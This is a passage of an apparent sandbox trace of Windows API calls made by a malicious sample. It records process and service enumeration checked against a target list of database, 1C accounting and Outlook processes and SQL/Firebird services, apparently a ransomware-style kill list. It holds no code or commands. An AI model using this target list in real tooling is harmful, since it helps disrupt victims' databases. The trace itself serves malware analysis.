lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0261.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0261.996] lstrlenW (lpString="SENS") returned 4 [0261.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0261.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0261.997] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0261.997] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0261.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0261.997] lstrlenW (lpString="ShellHWDetection") returned 16 [0261.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0261.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0261.997] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0261.997] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0261.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0261.997] lstrlenW (lpString="Spooler") returned 7 [0261.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0261.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0261.997] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0261.997] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0261.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0261.997] lstrlenW (lpString="Themes") returned 6 [0261.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0261.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0261.997] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0261.997] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0261.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0261.997] lstrlenW (lpString="UxSms") returned 5 [0261.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0261.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0261.997] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0261.997] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0261.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0261.997] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5e5e18 | out: hHeap=0x520000) returned 1 [0261.997] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x128 [0261.999] Process32FirstW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.999] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.999] lstrlenW (lpString="System") returned 6 [0261.999] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0261.999] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0261.999] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0261.999] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0261.999] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0261.999] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0261.999] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0261.999] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.999] lstrlenW (lpString="smss.exe") returned 8 [0262.000] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0262.000] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0262.000] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0262.000] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0262.000] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0262.000] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0262.000] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0262.000] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.000] lstrlenW (lpString="csrss.exe") returned 9 [0262.000] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0262.000] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0262.000] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0262.000] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0262.000] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0262.000] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0262.000] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0262.000] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.000] lstrlenW (lpString="wininit.exe") returned 11 [0262.000] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0262.000] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0262.001] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0262.001] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0262.001] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0262.001] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0262.001] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0262.001] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.001] lstrlenW (lpString="csrss.exe") returned 9 [0262.001] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0262.001] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0262.001] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0262.001] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0262.001] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0262.001] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0262.001] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0262.001] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.001] lstrlenW (lpString="winlogon.exe") returned 12 [0262.001] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0262.001] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0262.001] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0262.001] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0262.001] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0262.002] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0262.002] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0262.002] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.002] lstrlenW (lpString="services.exe") returned 12 [0262.002] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0262.002] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0262.002] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0262.002] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0262.002] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0262.002] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0262.002] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0262.002] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.002] lstrlenW (lpString="lsass.exe") returned 9 [0262.002] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0262.002] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0262.002] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0262.002] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0262.002] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0262.002] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0262.002] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0262.003] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0262.003] lstrlenW (lpString="lsm.exe") returned 7 [0262.003] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0262.003] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0262.003] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0262.003] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0262.003] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0262.003] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0262.003] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0262.003] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.003] lstrlenW (lpString="svchost.exe") returned 11 [0262.003] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.003] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.003] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.003] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.003] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.003] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.003] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.003] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.004] lstrlenW (lpString="svchost.exe") returned 11 [0262.004] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.004] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.004] lstrlenW (lpString="svchost.exe") returned 11 [0262.004] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.004] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.004] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.005] lstrlenW (lpString="svchost.exe") returned 11 [0262.005] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.005] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.005] lstrlenW (lpString="svchost.exe") returned 11 [0262.005] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.005] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.005] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.005] lstrlenW (lpString="audiodg.exe") returned 11 [0262.006] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0262.006] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0262.006] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0262.006] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0262.006] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0262.006] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0262.006] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0262.006] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.006] lstrlenW (lpString="svchost.exe") returned 11 [0262.006] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.006] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.006] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.006] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.006] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.006] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.006] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.006] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.006] lstrlenW (lpString="svchost.exe") returned 11 [0262.006] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.006] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.007] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.007] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.007] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.007] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.007] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.007] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0262.007] lstrlenW (lpString="userinit.exe") returned 12 [0262.007] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0262.007] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0262.007] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0262.007] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0262.007] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0262.007] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.007] lstrlenW (lpString="dwm.exe") returned 7 [0262.007] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.008] lstrlenW (lpString="explorer.exe") returned 12 [0262.008] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.008] lstrlenW (lpString="spoolsv.exe") returned 11 [0262.008] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0262.008] lstrlenW (lpString="taskhost.exe") returned 12 [0262.008] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.009] lstrlenW (lpString="svchost.exe") returned 11 [0262.009] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0262.009] lstrlenW (lpString="payload.exe") returned 11 [0262.009] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0262.009] lstrlenW (lpString="dllhost.exe") returned 11 [0262.009] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0262.009] lstrlenW (lpString="reader_sl.exe") returned 13 [0262.009] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="AdobeARM.exe")) returned 1 [0262.010] lstrlenW (lpString="AdobeARM.exe") returned 12 [0262.010] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0262.010] lstrlenW (lpString="cmd.exe") returned 7 [0262.010] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0262.010] lstrlenW (lpString="conhost.exe") returned 11 [0262.010] Process32NextW (in: hSnapshot=0x128, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0262.011] CloseHandle (hObject=0x128) returned 1 [0262.011] Sleep (dwMilliseconds=0x1f4) [0262.571] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x559e18 [0262.602] EnumServicesStatusExW (in: hSCManager=0x559e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0262.760] GetLastError () returned 0xea [0262.760] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa64) returned 0x5e5e18 [0262.760] EnumServicesStatusExW (in: hSCManager=0x559e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x5e5e18, cbBufSize=0xa64, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x5e5e18, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0262.760] CloseServiceHandle (hSCObject=0x559e18) returned 1 [0262.760] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0262.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0262.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0262.760] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0262.760] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0262.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0262.760] lstrlenW (lpString="AudioSrv") returned 8 [0262.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0262.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0262.760] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0262.761] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0262.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0262.761] lstrlenW (lpString="BFE") returned 3 [0262.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0262.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0262.761] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0262.761] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0262.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0262.761] lstrlenW (lpString="CscService") returned 10 [0262.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0262.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0262.761] lstrcmpiW 